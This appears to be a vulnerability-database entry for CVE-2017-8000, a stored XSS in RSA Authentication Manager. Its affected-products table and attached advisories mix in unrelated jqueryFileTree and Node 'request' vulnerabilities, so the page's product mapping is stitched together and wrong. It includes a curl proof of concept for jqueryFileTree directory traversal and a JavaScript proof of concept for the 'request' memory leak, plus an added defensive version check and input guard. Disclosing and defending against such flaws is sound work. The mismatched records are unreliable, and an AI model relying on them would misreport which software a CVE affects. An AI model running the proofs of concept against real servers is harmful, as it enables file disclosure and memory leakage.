CVE-2017-8000
Published: 2017-07-17

CVE-2017-8000: In EMC RSA Authentication Manager 8.2 SP1 and earlier, a malicious RSA Security Console Administrator could craft a token profile and store the profile name in…

Priority: P4 · 21 · medium · 4.8 CVSS 3.0
Vector: AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
EPSS: 0.90% (55.1th percentile)

In EMC RSA Authentication Manager 8.2 SP1 and earlier, a malicious RSA Security Console Administrator could craft a token profile and store the profile name in the RSA Authentication Manager database. The profile name could include a crafted script (with an XSS payload) that could be executed when viewing or editing the assigned token profile in the token by another administrator's browser session.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| emc | rsa_authentication_manager | <= 8.2 | — |
| jqueryfiletree_project | jqueryfiletree | 0 – 2.1.5 | — |
| request_project | request | >= 2.2.6 < 2.68.0 | 2.68.0 |
| request_project | request | >= 2.49.0 < 2.68.0 | 2.68.0 |
CVSS provenance
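| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 4.8 | MEDIUM | CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N |
| nvd | v2.0 | 3.5 | LOW | AV:N/AC:M/Au:S/C:N/I:P/A:N |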
GHSA
GHSA-3f4h-fm5j-ghcc: In EMC RSA Authentication Manager 8
ghsa_unreviewed·2022-05-17
CVE-2017-8000 [MEDIUM] CWE-79 GHSA-3f4h-fm5j-ghcc: In EMC RSA Authentication Manager 8
GHSA
jqueryFileTree vulnerable to Directory Traversal
ghsa·2022-05-13
CVE-2017-1000170 [HIGH] CWE-22 jqueryFileTree vulnerable to Directory Traversal
jqueryFileTree 2.1.5 and older is vulnerable to Directory Traversal
### POC:
```bash
curl 'http://localhost:8000/js/jqueryfiletree-2.1.5/dist/connectors/jqueryFileTree.php' -H 'Referer: xxx' -d "dir=/"
```
GHSA
Remote Memory Exposure in request
ghsa·2018-11-09
CVE-2017-16026 [MEDIUM] CWE-201 Remote Memory Exposure in request
Affected versions of `request` will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of `body` is `number`, then a buffer of that size will be allocated and sent to the remote server as the body.
## Proof of Concept
```js
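var request = require('request');
var http = require('http');

// Local listener that prints whatever bytes arrive as the request body.
var serveFunction = function (req, res) {
  req.on('data', function (data) {
    console.log(data);
  });
  res.end();
};
var server = http.createServer(serveFunction);
server.listen(8000);

// A multipart part whose body is a number: affected versions allocate a
// buffer of that size and send it to the server as the body.
request({
  method: "POST",
  uri: 'http://localhost:8000',
  multipart: [{ body: 500 }]
}, function (err, res, body) {});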
```
## Recommendation
Update to version 2.68.0 or later
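
Where the upgrade cannot be rolled out at once, the condition the advisory describes can be refused before it reaches the library. The following is an added example, not code from the advisory or from the `request` project; `isAffectedVersion` and `assertSafeMultipart` are hypothetical helper names, and the version range is the wider of the two `request` ranges listed in the table on this page.

```javascript
// Affected range from the table on this page: >= 2.2.6 and < 2.68.0.
const AFFECTED_MIN = [2, 2, 6];
const FIXED_IN = [2, 68, 0];

// Parse "major.minor.patch" into three integers (pre-release suffix ignored).
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(String(v));
  if (!m) throw new TypeError('unrecognised version: ' + v);
  return m.slice(1).map(Number);
}

// Compare two [major, minor, patch] triples; returns -1, 0 or 1.
function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// Hypothetical helper: is this installed `request` version in the affected range?
function isAffectedVersion(v) {
  const p = parseVersion(v);
  return compareVersions(p, AFFECTED_MIN) >= 0 && compareVersions(p, FIXED_IN) < 0;
}

// Hypothetical guard: run on the `multipart` option before passing it to request.
// request accepts either an array of parts or { chunked, data: [parts] }.
// Only string, Buffer and stream-like bodies pass; a number is rejected because
// affected versions turn it into a buffer of that size.
function assertSafeMultipart(multipart) {
  const parts = Array.isArray(multipart) ? multipart : multipart && multipart.data;
  if (!Array.isArray(parts)) throw new TypeError('multipart must contain an array of parts');
  parts.forEach(function (part, i) {
    const body = part == null ? undefined : part.body;
    const streamLike = body != null && typeof body.pipe === 'function';
    if (typeof body !== 'string' && !Buffer.isBuffer(body) && !streamLike) {
      throw new TypeError('multipart[' + i + '].body has unsafe type: ' + typeof body);
    }
  });
  return parts;
}

// Constructed sample input: the part from the proof of concept is refused.
function pocPartIsRejected() {
  try { assertSafeMultipart([{ body: 500 }]); return false; } catch (e) { return true; }
}
```

The guard matters most where a part's `body` is derived from parsed JSON or other caller-supplied data, since that is how a number can arrive where a string was expected.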
No detection rules found.
2017-07-17
Published